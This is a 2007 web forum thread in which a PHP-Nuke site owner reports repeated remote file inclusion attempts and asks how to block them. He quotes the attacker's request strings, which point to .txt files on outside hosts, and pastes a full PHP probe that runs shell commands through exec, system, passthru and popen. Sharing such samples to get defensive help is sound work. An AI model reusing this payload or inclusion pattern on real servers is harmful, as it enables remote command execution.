Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 6 of 6
  1. #1
    New to the CF scene
    Join Date
    Nov 2007
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Question Site under attack - Get posts

    I'm relatively new to website and php. I run a website for my gaming community- www.clanpraetorian.net.

    I have PHP nuke running on the site with nuke sentinel. All updated etc..
    and sentinel keeps blocking this ip and access here is what line is being blocked. so far I've banned/blocked 1055 of his attempts.

    Get String: http://www.clanpraetorian.net/module...rsama/doc.txt?

    Query String: http://www.clanpraetorian.net/module...rsama/doc.txt?

    Post String: www.clanpraetorian.net/modules.php

    That particular one comes up Germany

    It's pretty obvious to me he's trying to activate this txt file for sql injection? He got me once already but i fixed the problem and he can't mess with the files. my question is how can i block the get string? or should i? I can't block his ip he's either using a proxy or moving around countries very fast . What i think i need is something in the htaccess file maybe?

    Thanks for any help

    Heres a couple of other blocks
    Get String: http://www.clanpraetorian.net/module...m/safeon.txt??
    Get String: http://www.clanpraetorian.net/module...93/safeon.txt?
    Get String: http://www.clanpraetorian.net/module...ctions/ok.txt?

    Here is txt file he is using for one site... http://www.kolortavil.org/Connections/ok.txt?

    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;
    Last edited by darthanian; 11-11-2007 at 07:51 PM. Reason: Txt File

  • #2
    The Apostate Apostropartheid's Avatar
    Join Date
    Oct 2007
    Posts
    3,215
    Thanks
    16
    Thanked 265 Times in 263 Posts
    All your links redirect to the FBI's website...?

  • #3
    New to the CF scene
    Join Date
    Nov 2007
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    no, lol

    Thats nuke sentinel blocking you. Fixed.. but it'll just ban you.
    Last edited by darthanian; 11-11-2007 at 08:36 PM.

  • #4
    Supreme Overlord Spookster's Avatar
    Join Date
    May 2002
    Location
    Marion, IA USA
    Posts
    6,280
    Thanks
    4
    Thanked 83 Times in 82 Posts
    Have you checked PHPNukes site for updates/patches?
    Spookster
    CodingForums Supreme Overlord
    All Hail Spookster

  • #5
    New to the CF scene
    Join Date
    Nov 2007
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by darthanian View Post
    I have PHP nuke running on the site with nuke sentinel. All updated etc..

  • #6
    New to the CF scene
    Join Date
    Nov 2007
    Posts
    4
    Thanks
    0
    Thanked 0 Times in 0 Posts
    No more ideas?


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •